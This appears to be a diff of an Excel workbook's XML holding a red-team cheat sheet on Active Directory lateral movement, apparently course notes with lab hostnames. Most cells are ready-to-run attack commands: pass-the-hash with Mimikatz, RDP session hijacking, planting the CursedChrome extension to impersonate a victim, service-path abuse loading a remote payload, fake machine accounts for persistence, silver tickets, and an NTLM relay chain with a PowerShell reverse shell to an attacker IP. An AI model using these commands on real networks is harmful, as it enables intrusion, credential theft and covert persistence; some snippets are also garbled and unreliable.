+    <t>PTH over RPC [rpcdump.py | PTH-rpcclient | PTH-net]</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># MITM in public key: attacker should be between "Alice, Bob and Key publisher"
+          -----1-Query:Bob's key----&gt;                 ----2-Query:Bob's key----&gt;
+Alice                                                      Attacker                                                    Key distribution server
+          &lt;----4-Attacker key--------                   &lt;----3-Bob's key------------  </t>
+  </si>
+  <si>
+    <t># How the attack work:
+In order for the attack work, the attacker (M) should be able to recognize the queries to the key server and take following steps to mount a successful MITM attack:
+- let we suppose that Alice query the "Key distribution server" to get BoB public key
+- The attacker intercept Alice's query and forward it to the "Keys Server"
+- The "key Server" send back Bob's public key
+- Then attacker intercept Bob's public key and store it
+- Then attacker send to Alice his own Public key instead of Bob's public key
+- Alice would encrypt data using the attacker Publc Key thinking that she is using Bob's public key
+- The attacker will decrypt Alice encrypted messages with his private key
+- The attacker then forwarded the message to Bob using Bob's public key</t>
+  </si>
+  <si>
+    <t># Modify registry to re-enable AT
+   Reg add "\\REMOTE\\HKLM\\SOFTWARE\MICROSFT\WindowsNT\CurrentVersion\Schedule\Configuration" /v EnableAT /t REG_DWORD /d 1"
+# Force restart NOT OPSEC Friendly
+   Shutdown /r /m \\REMOTE
+# Get computer time, executed and cleanup
+   net time \\REMOTE
+   at \\REMOTE TIME COMMAND
+   AT \\REMOTE AT_ID /delete 
+# The same functionality can be achived using Impacket's reg.py and atexec.py commands</t>
+  </si>
+  <si>
+    <t># Initiates the connection over port 135/tcp and then continues over an ephermal port 
+# Schatasks.exe Ecample
+  schatasks /create /F /tn TASKNAME /tr COMMAND /sc once /st 23:00 /s REMOTE /U USER /P PASSWORD
+  schatasks /run /F /tn TASKNAME /s REMOTE /U USER /P PASSWORD
+  schatasks /delete /F /tn TASKNAME /s REMOTE</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># passing the hash with the native RDP client from windows requires using Mimikatz
+   Mimikats # sekurlsa::pth /user:&lt;USER&gt; /doamin:&lt;DOMAIN&gt; /ntlm:&lt;NTLM-HASH&gt; /run:"mstsc.exe /restrictedadmin"
+# if restriced mode is disabled, we can enabled with the previous command with /run:"powershell.exe" and changing a registry key:
+   PS  &gt; Enter-PSSession -Computer &lt;TARGET&gt;
+   PS &gt;  New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisabledRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
+</t>
+  </si>
+  <si>
+    <t># The terminal services library (mstscax.dll) can be used by the scriptable control (webclient or scripts) and the non-scriptable control (native or managed code)
+# SharpRDP relies on the non-scriptable control of the COM Library and can be used to achieve authenticated remote code execution either providing plain text credentials or via restricted admin mode
+# SharpRDP, once authenticated, wil open up and Run dialog and send virtual Keystrokes to the remote system using the SendKeys method to execute the command
+# Runing commands from the Run dialog leaves registry entries in "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+# What is COM library ?
+   Provided as a set of DLLs and EXEs (primarily Ole32.dll and Rpcss.exe) in Microsoft Windows, 
+   the COM library includes the following: A small number of fundamental functions that facilitate the creation of COM applications, both client and server. For clients, COM supplies basic functions for creating objects.
+# what is COM application ?
+  The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact.</t>
+  </si>
+  <si>
+    <t># Some SharpRDP Usage examples are:
+- Regular Execution
+   SharpRDP.exe computername=&lt;TARGET.DOMAIN&gt; command="&lt;FILE_TO_EXECUTE&gt;" username=&lt;DOMAIN\USER&gt; password=&lt;PASSWORD&gt;
+- Exec as child process of cmd.exe
+  SharpRDP.exe computername=&lt;TARGET.DOMAIN&gt; command="&lt;FILE_TO_EXECUTE&gt;" username=&lt;DOMAIN\USER&gt; password=&lt;PASSWORD&gt; exec=cmd
+- Restricted Admin
+  SharpRDP.exe computername=&lt;TARGET.DOMAIN&gt; command="&lt;FILE_TO_EXECUTE&gt;"
+- Execute Elevated via taskmgr
+  SharpRDP.exe computername=&lt;TARGET.DOMAIN&gt; command="&lt;FILE_TO_EXECUTE&gt;" username=&lt;DOMAIN\USER&gt; password=&lt;PASSWORD&gt; elevated=taskmgr
+- Add NLA
+   SharpRDP.exe computername=&lt;TARGET.DOMAIN&gt; command="&lt;FILE_TO_EXECUTE&gt;" username=&lt;DOMAIN\USER&gt; password=&lt;PASSWORD&gt; nla=true</t>
+  </si>
+  <si>
+    <t xml:space="preserve">
+   </t>
+  </si>
+  <si>
+    <t># RDP sessions from other users can also be hijacked when the attacker has access to a user with the ability to create and start services on the server and other users are logged in via RDP
+   PS &gt; query user
+   =&gt; Result:
+   USERNAME              SESSIONNAME           ID           STATE           IDLE            TIME    
+   attaker                       rdp-tcp#23                  3              Active
+   administrator          rdp-tcp#22                  5              Active
+# once aother session is identified ther are two values to take into account:
+   - ID (take note the value of the session you want to take over) and SESSIONNAME (this should be the current session)
+# with these 2 value we can create a service abusing the tscon funtionality to take over the session
+   sc.exe create rdphijack binpath="cmd.exe /c tscon 5 /dest:rdp-tcp#23"
+# After the service has been created just starting it will connect the other session to our current session.
+   This is usefull when multiple sessions from the same user are availble.
+   PS &gt; net start rdphijack
+# one done remove the service created
+   PS &gt; sc.exe delete rdphijack</t>
+  </si>
+  <si>
+    <t>Intercepting functions call in mstsc.exe</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Browser pivoting is a technique where browser traffic is pivoted from the attacker's browser through the user's browser by setting up an HTTP proxy and redirecting all web traffic
+# The attacker "inherits" the security context, certificates and cookies of the user and he is therfore able to browse any resources,either from the internet or external impersonating the victim's identity
+</t>
+  </si>
+  <si>
+    <t># CursedChrome is a chrome-extension that allows to turn a target's Chrome browser into fully funtional HTTP proxy.
+   As a result, the web can be browsed impersonating the target identity for all websites
+# cursedchrome will listen in the following ports:
+   - 127.0.0.1:8118 Admin panel for managing chrome instances and obtaining http proxy credentials 
+   - 127.0.0.1:8080 https proxy server. By using credentials of chrome, instances from the admin panel, traffic can be restriced through the target's user browser
+   - 127.0.0.1:4343 websocket server used to communicate with the victim chrome instances
+# To install cursed chrom first we need to install docker-compose:
+    apt install docker docker-compose
+    git clone https://github.com/mandatoryprogrammer/CursedChrome.git
+# edit line 32 from the docker-compose.yaml to expose the webscoket server:
+   "4343:4343".#.WebSocket.server.(talks.with.implants)
+# Start CursedChrom:
+   //Start up redis and Postgress Containers
+        docker-compose up -d redis db
+ // Start the cursedchrome backend
+      docker-compose up cursedchrome
+// take note of the admin credentials as they will be used for the first login
+# once we logi ninto the admin interface the default password nust be changed and the cursedchrome CA must be installed in order to proxy HTTPS requests
+# In firefox it can be installed via preferences - privacy - view certificates and importing it under the Authorities tab
+# in the extension folder, edit the file under srv subfolder called backround.js
+   around line 258 under the unitialize funtion edit the WebSocket connection string to match our CursedChrome WebSocket server address
+  websocket.=.new WebSocket("ws://192.168.10.10:4343");
+# transfer the extension folder to the target's computer and head to chrome:/extensions
+# once there, toggle developer mode on and install the extension by clicking under "Load unpacked" and selecting the extension folder
+# as soon the extension is installed we can see a new connected bot under the CursedChrome admininstration pane
+# We can now configure a new http proxy in our browser with the http proxy credentials.
+   in this case FoxProxy is used in FireFox to easly switch to the target's context
+# Once the target authenticates in a website (regardless of having 2FA enabled or not), the traffic from our browser will be routed through the target's browser allowing us to impersonate the target's identity</t>
+  </si>
+  <si>
+    <t># SCShell is a fileless lateral movement tool that uses ChangeServiceConfigA to run commands authenticating via DCERPC instead of SMB
+  - ChangeServiceConfigA: is one of many programming interfaces of the winsvc.h header 
+  - winsvc.h header needed to develop security and identity
+  - ChangeServiceConfigA: Changes the optional configuration parameters of a service.
+  - DCE/RPC is a remote a procedure developed for the Distributed Computing Environment
+    This system allows programmers to write distributed software as if it were all working on the same computer, without having to worry about the underlying network code.
+# It can be used without registering or creating new services and usually does not need to drop any files on the remote system</t>
+  </si>
+  <si>
+    <t># It works by remotly opening a service and modifiying the binary path name calling the ChangeServiceConfigA API
+  - It is recommended to use "C:\windows\system32\cmd.exe /c" to ensure the payload will not be killed when the service stops.
+    PS &gt; SCShell.exe &lt;TARGET&gt; XblAuthManager "c:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://&lt;PAULOAD-WEBSITE&gt;/payload.sct scrobj.dll" . &lt;USER&gt;&lt;PASSWORD&gt;
+# SCShell.py requires impacket to be installed in the operator's machine but can perform the same functionality including Pass-The-Hash or Kerberos Authentication
+  The C version will use the default process token so a tool similar to Mimikatz will be required to perform PTH
+# Similar SCShell functionality can be achieved via WMI using wmic.exe and 4 different commands:
+  - Get current path name of the service to restore it later
+    wmic /user:&lt;DOMAIN\USER&gt; /password:&lt;PASSWORD&gt; /node:&lt;TARGET&gt; service where name='XblAuthManager' get pathname
+  - Change the path name to the command to be executed
+     wmic /user:&lt;DOMAIN\USER&gt; /password:&lt;PASSWORD&gt; /node:&lt;TARGET&gt; service where name='XblAuthManager' call change PathName="C:\Windows\Microsoft.Net\Framework\V4.0.30319\MSBuild.exe C:\testPayload.xml"
+  - Start the service
+    wmic /user:&lt;DOMAIN\USER&gt; /password:&lt;PASSWORD&gt; /node:&lt;TARGET&gt; service where name='XblAuthManager' call start service
+  - Restore the service Path Name
+     wmic /user:&lt;DOMAIN\USER&gt; /password:&lt;PASSWORD&gt; /node:&lt;TARGET&gt; service where name='XblAuthManager' call change PathName="C:\Windows\system32\svchost.exe -k netsvcs"</t>
+  </si>
+  <si>
+    <t># winrs Example:
+  winrs -r:REMOTE -u:DOMAIN\USER -p:PASSWORD notepad.exe
+# PowerShell Example avoiding double-hop problem with -EnableNetworkAccess
+  PS&gt; Enter-PSSession -ComputerName REMOTE -Credential DOMAIN\USER -EnableNetworkAccess
+# WinRM.vbs available by default
+  cscript \\nolog "C:\windows\system32\winrm.vbs" invoke create wmicimv2\win32_process @{CommandLine="notepad.exe"} -r:IPADDRESS
+# WSMan-WinRM is a collection of source code and scripts for executing commands over WinRM using the WSMan.Automation COM object
+   In this case we will focus on the ShawpWSManWinRM.cs file
+ Step1- Creat a new C# Project in Visual Studio, preferably using 2019 version
+ Step2- Configure your project as .Net Framework 4 for better compatibility and give it the name of SharpWinRM and save it in this location:
+               C:\Users\Operator\source\repos\SharepWinRM\SharpWinRM\bin\Debug\SharpWinRM.exe
+ Step3- Copy the SharpWSManWinRM.cs contents to the new projet, right click References -&gt; Add References and under the COM menu select Microsoft WSMAN Automation V1.0 Library
+ Step4- If the computer is not domain joined, you should add the target computer to the TrustedHosts list. This can be done via the following commands from an elevated PowerShell Session:
+               PS &gt; winrm quickconfig
+              // Add coma separated hosts as trusted
+              PS &gt; Set-Item WSMan:\localhost\Client\TrustedHosts -Value '&lt;TARGET_HOST&gt;,&lt;TARGET_HOST2&gt;'
+            // Add all hosts as trusted insecure
+             PS &gt; Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*'
+Step5- Once the needed references are added to the project it can be build and used as follows:
+              PS &gt; SharpWinRM.exe &lt;HOST&gt; &lt;COMMAND&gt;
+              PS &gt; SharpWinRM.exe &lt;HOST&gt; &lt;COMMAND&gt; &lt;DOMAIN\USER&gt; &lt;PASSWORD&gt;
+              PS &gt; C:\Users\Operator\source\repos\SharepWinRM\SharpWinRM\bin\Debug\SharpWinRM.exe ELS-DC01 notepad.exe ELS\Administrator P@ssw0rd!</t>
+  </si>
+  <si>
+    <t># Component Object Model COM is as a protocol used for process intercommunication. 
+  Although COM objects cannot be used over the network, Distributed COM (DCOM) can be used for lateral movement although windows Firewall can block some attempts</t>
+  </si>
+  <si>
+    <t># DCOM offers a lot of different possibilites for lateral movement. Some useful resources:
+  - Impacket's dcomexec.py
+  - SharpExcel4-Dcom: Uses Excel 4.0/XLM Macros via DCOM for executig shellcode
+  - Invoke-DCOM or its C# port in SharpSploit
+  - DCOMRade: Enumerates DCOM candidates for lateral movement
+  - Using Powershell (ExecuteShellCommand method only allows four arguments)
+    //Powershell Examples:
+      $COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION","REMOTE"));$COM.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\cmd.exe", $Null, "/c", "notepad.exe")</t>
+  </si>
+  <si>
+    <t># PoshC2 Invoke-Pbind.ps1 creates a bin shell using named pipes to communicate.
+  Although the initial execution is via WMI or PSExec it can be very useful if we are in early stages of the engagement and do not want to deploy an implant on the target machine to avoid detection
+  PS C:\&gt; Invoke-Pbind -Target 192.168.100.23 -Domain ELS -User eLSAdmin -Password hard2crack!</t>
+  </si>
+  <si>
+    <t># Computer account can be used for lateral movement too as they are security principals like any other user and group, having attributes like membership, security indetifier,etc.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Computer accounts rotate their password every 30 days by defautl making unusable the NTLM hash or Password for performing lateral movement after the change.
+   This issue can be solved by: Under HKLM\SYSTEM\CurrentControlSet\Service\NetLogon\Parameters:
+   - Changing MaximumPasswordAge to a bigger value
+   - Changing DisablePasswordChange value to 1
+# Machine account password are located under: HKEY_LOCA_MACHINE\SECURITY\Policy\Secrets and can only be accessed by NT AUTHORITY\SYSTEM
+  Obtaining the machine account password can be done using Impacket's secretsdump.py or Mimikatz
+  secretdump.py &lt;DOMAIN&gt;/&lt;USER&gt;@&lt;TARGET_COMPUTER_FQDN&gt;  
+  secretdump.py ELS/Attacker@W10-Desktop.ELS.LOCAL
+  or 
+  mimikatz # privilege::debug
+  mimikatz # sekurlsa::LogonPasswords
+# Now execute Pass The Hash to know where the current account has access to:
+   mimikatz # sekurlsa::pth /user:&lt;MACHINE_ACC&gt; /domain:&lt;DOMAIN&gt; /ntlm:&lt;MACHINE_ACCOUNT_HASH&gt; /run:powershell.exe
+   mimikatz # sekurlsa::pth /user:W10-Desktop01$ /domain:ELS.LOCAL /ntlm:&lt;MACHINE_ACCOUNT_HASH&gt; /run:powershell.exe
+# return a list where the machine account has Local Administrator access:
+  PS &gt; Import-Module .\PowerSploit.psm1
+  PS &gt; Find-LocalAdminAccess
+  =&gt; Result : W10-DESKTOP01
+                        w2k12-01
+# To verify a local admin for a specific target's computer:
+   PS &gt; Get-NetLocalGroup -ComputerName &lt;TARGET&gt; -API -GroupName &lt;GROUP&gt;
+   =&gt; Result: W10-DESKTOP01$ is local admin to w2k12-01
+# use winrs to move laterally using the machine account to the target computer
+  PS &gt; winrs -r:&lt;TARGET&gt; &lt;COMMAND&gt;
+  PS &gt; winrs -r:w2k12-01 cmd.exe
+  =&gt; Result: whoami = W10-DESKTOP-01$
+                       hostname = w2k12-01
+# Remember that by default, every athenticated user can join up to 10 computers to a domain because of the ms-DS-MachineAccountQuota
+   This can be leveraged to create fake computer accounts with no password expiration data as there is not a real computer joined to the domain
+# PowerMad can be use to add fake computer accounts to the domain and use as a persistence mechanism for later access by adding them to the Local Administrators group
+   PS &gt; Import-Module .\Powermad.psd1
+   PS &gt; $machine_account_password = ConvertTo-SecureString '&lt;PASSWORD&gt;' -AsPlainText -Force
+   PS &gt; $machine_account_password = ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force
+   PS &gt; New-MachineAccount -MachineAccount &lt;FAKEPC&gt; -Password $machine_account_password -Verbose
+   PS &gt; New-MachineAccount -MachineAccount ELSFAKE -Password $machine_account_password -Verbose
+# The fake computer account can be added to the target's computer local administrators group via:
+   PS &gt; winrs -r:&lt;TARGETCOMPUTER&gt; net localgroup administrators "&lt;FAKECOMPUTERACCOUNT&gt;" /add
+   PS &gt; winrs -r:w2k12-01.ELS.LOCAL net localgroup administrators "ELS\ELSFAKE$" /add
+   PS &gt; Get-NetLocalGroup -ComputerName &lt;TARGET&gt; -API -GroupName Administrators
+# This fake computer account has a known password that will never expire and has local administrator to the target's computer.
+   PS &gt; runas /user:&lt;FAKECOMPUTERACCOUNT&gt; /netonly cmd.exe
+   PS &gt; runas /user:ELS\ELSFAKE /netonly cmd.exe
+  // Under the new powershell prompt
+  PS &gt; winrs -r:&lt;TARGETCOMPUTER&gt; cmd.exe
+  PS &gt; winrs -r:w2k12-01.ELS.LOCAL cmd.exe
+# to maintain access we can creat a silver tickers using the machine account hash:
+  - ticketer.py -aeskey &lt;MACHINE_ACCOUNT_HASH&gt; -domain-sid &lt;SID&gt; -domain &lt;DOMAIN_FQDN&gt; -spn &lt;SPN&gt; &lt;ANYUSER&gt;
+  - export KRB5CCNAME=&lt;ANYUSER&gt;.ccache
+  - psexec.py -k -no-pass &lt;DOMAIN&gt;/&lt;ANYUSER&gt;@&lt;TARGET_COMPUTER&gt; -dc-ip &lt;DC_IP&gt;
+</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># NT Lan Manger (NTLM) authentication protocol is used by application protocols to authenticate remote users between client and servers 
+  and provide session when requested by the application
+# Contrary to NTLM hashes, Pass The Hash attacks cannot be performed with Net-NTLM hashes
+</t>
+  </si>
+  <si>
+    <t># Net-NTLM hashes can be cracked or relayed to another machine if they have SMB Sigining disabled.
+  In order to relay Net-NTLM hashes the following tools can be used:
+  - Crackmapexec: this will generate a list of hosts with SMB Siging disabled
+  - Responder: LLMNR/NBT-NT/mDNS Poisoner and NTLMv1/2 Relay
+  - Impacket's ntlmrelayx: this will be used to relay NET-NTLM hashes
+  - PowerShell Reverse Shell: Or any other payload you want to execute
+# Crackmapexec can be used to scan a network range and identify hosts with SMB Signing disabled and if they are using SMBv1:
+   crackmapexe smb &lt;CIDR=192.168.10.0./24&gt; --gen-relay-list &lt;OUTPUT_FILE&gt;
+# A simple reverse shell will be executed to simplify the execution, a file called command.txt will be hosted in the attacker's machine containing the reverse shell
+  $client = New-Object System.Net.Sockets.TCPClient ('&lt;ATTACKER_IP&gt;',&lt;PORT&gt;);
+  $stream = $client.GetStream();
+  [byte[]$bytes = -..65535|%{0};
+  while()$i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
+  {
+  ;data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
+  $sendback = (iex $data 2&gt;&amp;1 | Out-String );
+  $sendback2 = $sendback + 'PS' + (pwd).Path + '&gt; ';
+  $sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2);
+  $stream.Write($sendbyte,0,$sendbyte.Length).$stream.Flush()
+  };
+ $client.Close()
+# Remember to start an http server in a different port than 80 and a netcat listener to receive the incoming connections from the server:
+   python3 -m http.server &lt;ALTERNATIVE_HTTP_PORT&gt;
+   nc -nvlp &lt;REVERSE_SHELL_PORT&gt;
+# It is necessary to edit the responder configuration file to disable HTTP server and SMB server as ntlmrelayx will be used for relaying hashes while responder will only poison the network
+  cat /etc/responder/Responder.conf
+# Ntlmrelayx can now be used to target the list of computers with SMB Siging disabled or a specific computer and a command to execute.
+   In case no command is provided, hashes from this machine will be extracted using secretsdump.py
+   In this case, a command will be executed to receive the reverse shell from a specific computer
+   Remember to enable -smb2support as in this case SMBv1 was disabled:
+  ntlmrelayx.py -t &lt;TARGET_COMPUTER&gt; -c 'powershell -ep bypass -c "iex (New-Object Net.WebClient).DownloadString(\"htpp://&lt;ATTACKER_IP&gt;:&lt;HTTP_PORT&gt;/command.txt\")"' -smb2support
+# With everything in place, the last step will be start poisoing the network using responder and wait for the target to enter valid credentials:
+  responder -I &lt;IFACE=eth1&gt; -v
+# Poisoned requests will present the following prompt to the target's user
+  Once credentials are entered, they will be relayed to the computer targeted using ntlmrelayx
+# Once the user authenticates, ntlmrelayx will execute the command in the target machine, resulting in a reverse shell as a NT AUTHORITY\SYSTEM</t>
+  </si>
+  <si>
+    <t># PSWA was introduced in windows server 20212 for providing web-based windows powershell consoles targeting remote computers
+   This allow to run powershell commands via a web browser without configuring powershell on:
+  - the remote computer , 
+  - remote management software 
+  - or plug-in installation on the client device</t>
+  </si>
+  <si>
+    <t># The only requirement for windows powershell web access are a configured PSWA gateway and browser client device supporting javascript and accepting cookies
+   The main requirement are:
+   - Admin access on a machine
+   - Powershell version +3
+   - Allow inbound traffic on port 443
+   - Install windows powershell web access: PS &gt; Install-WindowsFeature -Name WindowsPowerShellWebAccess
+   - configure the PSWA gateway with a test certificate:  PS &gt; Install-PswaWebApplication -useTestCertificate
+   - Configure Authorization rules: PS &gt; Add-PswaAuthorizationFule -UserName &lt;USERNAME&gt; - ComputerName &lt;COMPUTER&gt; -ConfigurationName &lt;CONFIG_NAME&gt;
+# Now PWAC can be reached under https://&lt;MACHINE_NAME&gt;/pswa</t>
+  </si>
+  <si>
+    <t># RDP credential can also be access interceptig funtion calls (API Hooking) in mstsc.exe , the native windows binary that creates connections to Remote Desktop Services
+# To extract credentials using this technique we need:
+    - RemoteViewing: it will hook the necessary funtions in mstsc in order to extract credentials and save them to a file
+    - Donut: creates a shellcode from RemoteViewing ready to be injected in mstsc processes.
+    - Shellcode Injector: create a custom shellcode injector tool that checks for new mstsc processes and injects RemoteViewing shellcode into them</t>
+  </si>
+  <si>
+    <t># Named pipes allow process communication in a FIFO manner via the SMB protocol
+# They can operate in one-way or duplex pipe for communication, meaning they can listen for connections and also requests</t>
+  </si>
+  <si>
+    <t># Windows Remote Management (WinRM) is a Microsoft implementation of the WS-Management Protocol.
+  it basically uses WMI over HTTP(S) over 5985/TCP and 5986/TCP
+# WinRM requires listeners on the client and server to process requests.
+  This can be enabled using the Powershell command 'Enable-PSRemoting -Force' locally and remotely using any of the previous techniques
+# Some useful tools for performing lateral movement with WinRM are:
+  - winrs
+  - Enter-PSSession (powershell remoting, build on top of WinRM)
+  - HackPlayer's Evil-WinRM
+  - MSF auxiliary/scanner/winrm/winrm_cmd module
+# what is  Double-Hop problem: 
+  Netwrok-logons do not send the credentials to the remote machine, so the process cannot authenticate against other resources
+  Some usefull solutions to avoid the Double-Hope probleme are
+  - Impacket's SMBServer can be used to host the payloads without requiring user authentication. This will avoid the need of transferring the payloads to the remote computer
+  - Invoke-TmpDavsFS, a Memory backed PowerShell WeDAV Server can be also useful for hosting payloads internally
+  - WsgiDav: can be used as a standalone WebDAV server without user authentication
+# 4 main logon scenario:
+   - interactive logon
+   - Network logon
+   - Smart card logon
+   - Biometric logon</t>
+  </si>
+  <si>
+    <t>Leteral movement in AD [Pass The Hash]</t>
+  </si>
+  <si>
+    <t>Leteral movement in AD</t>
   </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <fonts count="18" x14ac:knownFonts="1">
+  <fonts count="19" x14ac:knownFonts="1">
     <font>
       <sz val="11"/>
       <color rgb="FF000000"/>
@@ -8661,8 +9213,15 @@
       <family val="2"/>
       <scheme val="minor"/>
     </font>
+    <font>
+      <b/>
+      <sz val="8"/>
+      <color rgb="FFFFFFFF"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+    </font>
   </fonts>
-  <fills count="17">
+  <fills count="21">
     <fill>
       <patternFill patternType="none"/>
     </fill>
@@ -8759,6 +9318,30 @@
         <bgColor rgb="FF99CC00"/>
       </patternFill>
     </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FF000000"/>
+        <bgColor indexed="64"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor rgb="FFF2F2F2"/>
+        <bgColor indexed="64"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor theme="4"/>
+        <bgColor indexed="64"/>
+      </patternFill>
+    </fill>
+    <fill>
+      <patternFill patternType="solid">
+        <fgColor theme="2"/>
+        <bgColor indexed="64"/>
+      </patternFill>
+    </fill>
   </fills>
   <borders count="5">
     <border>
@@ -8823,7 +9406,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="74">
+  <cellXfs count="78">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
@@ -8966,10 +9549,22 @@
     <xf numFmtId="0" fontId="14" fillId="15" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="18" fillId="17" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="18" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="19" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center"/>
+    </xf>
     <xf numFmtId="0" fontId="5" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
     <xf numFmtId="0" fontId="5" fillId="14" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="5" fillId="20" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
     </xf>
   </cellXfs>
@@ -9367,16 +9962,16 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:E326"/>
+  <dimension ref="A1:E348"/>
   <sheetViews>
-    <sheetView tabSelected="1" zoomScale="106" zoomScaleNormal="106" workbookViewId="0">
-      <selection activeCell="C19" sqref="C19"/>
+    <sheetView tabSelected="1" topLeftCell="A25" zoomScaleNormal="100" workbookViewId="0">
+      <selection activeCell="C51" sqref="C51"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="10.5" customHeight="1" x14ac:dyDescent="0.2"/>
   <cols>
     <col min="1" max="1" width="19.28515625" style="1" bestFit="1" customWidth="1"/>
-    <col min="2" max="2" width="54" style="19" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="56.85546875" style="19" bestFit="1" customWidth="1"/>
     <col min="3" max="3" width="55" style="19" customWidth="1"/>
     <col min="4" max="4" width="99" style="37" customWidth="1"/>
     <col min="5" max="5" width="57.140625" style="1" customWidth="1"/>
@@ -9384,18 +9979,18 @@
   </cols>
   <sheetData>
     <row r="1" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A1" s="72" t="s">
-        <v>329</v>
-      </c>
-      <c r="B1" s="72"/>
-      <c r="C1" s="72"/>
-      <c r="D1" s="73"/>
+      <c r="A1" s="75" t="s">
+        <v>325</v>
+      </c>
+      <c r="B1" s="75"/>
+      <c r="C1" s="75"/>
+      <c r="D1" s="76"/>
     </row>
     <row r="2" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A2" s="72"/>
-      <c r="B2" s="72"/>
-      <c r="C2" s="72"/>
-      <c r="D2" s="73"/>
+      <c r="A2" s="75"/>
+      <c r="B2" s="75"/>
+      <c r="C2" s="75"/>
+      <c r="D2" s="76"/>
     </row>
     <row r="5" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B5" s="9" t="s">
@@ -9414,7 +10009,7 @@
       </c>
       <c r="C6" s="12"/>
       <c r="D6" s="13" t="s">
-        <v>338</v>
+        <v>334</v>
       </c>
       <c r="E6" s="2"/>
     </row>
@@ -9450,7 +10045,7 @@
         <v>104</v>
       </c>
       <c r="D9" s="15" t="s">
-        <v>339</v>
+        <v>335</v>
       </c>
     </row>
     <row r="10" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9488,187 +10083,182 @@
         <v>93</v>
       </c>
       <c r="C14" s="23" t="s">
-        <v>231</v>
+        <v>229</v>
       </c>
       <c r="D14" s="13" t="s">
-        <v>620</v>
+        <v>615</v>
       </c>
     </row>
     <row r="15" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B15" s="70" t="s">
-        <v>622</v>
+        <v>617</v>
       </c>
       <c r="C15" s="23"/>
       <c r="D15" s="13" t="s">
-        <v>623</v>
+        <v>618</v>
       </c>
     </row>
     <row r="16" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B16" s="70" t="s">
-        <v>621</v>
+        <v>616</v>
       </c>
       <c r="C16" s="71" t="s">
-        <v>624</v>
+        <v>619</v>
       </c>
       <c r="D16" s="69" t="s">
-        <v>625</v>
+        <v>620</v>
       </c>
     </row>
     <row r="17" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B17" s="24" t="s">
-        <v>232</v>
-      </c>
-      <c r="C17" s="25" t="s">
-        <v>277</v>
-      </c>
-      <c r="D17" s="36" t="s">
-        <v>640</v>
+        <v>43</v>
+      </c>
+      <c r="C17" s="26" t="s">
+        <v>108</v>
+      </c>
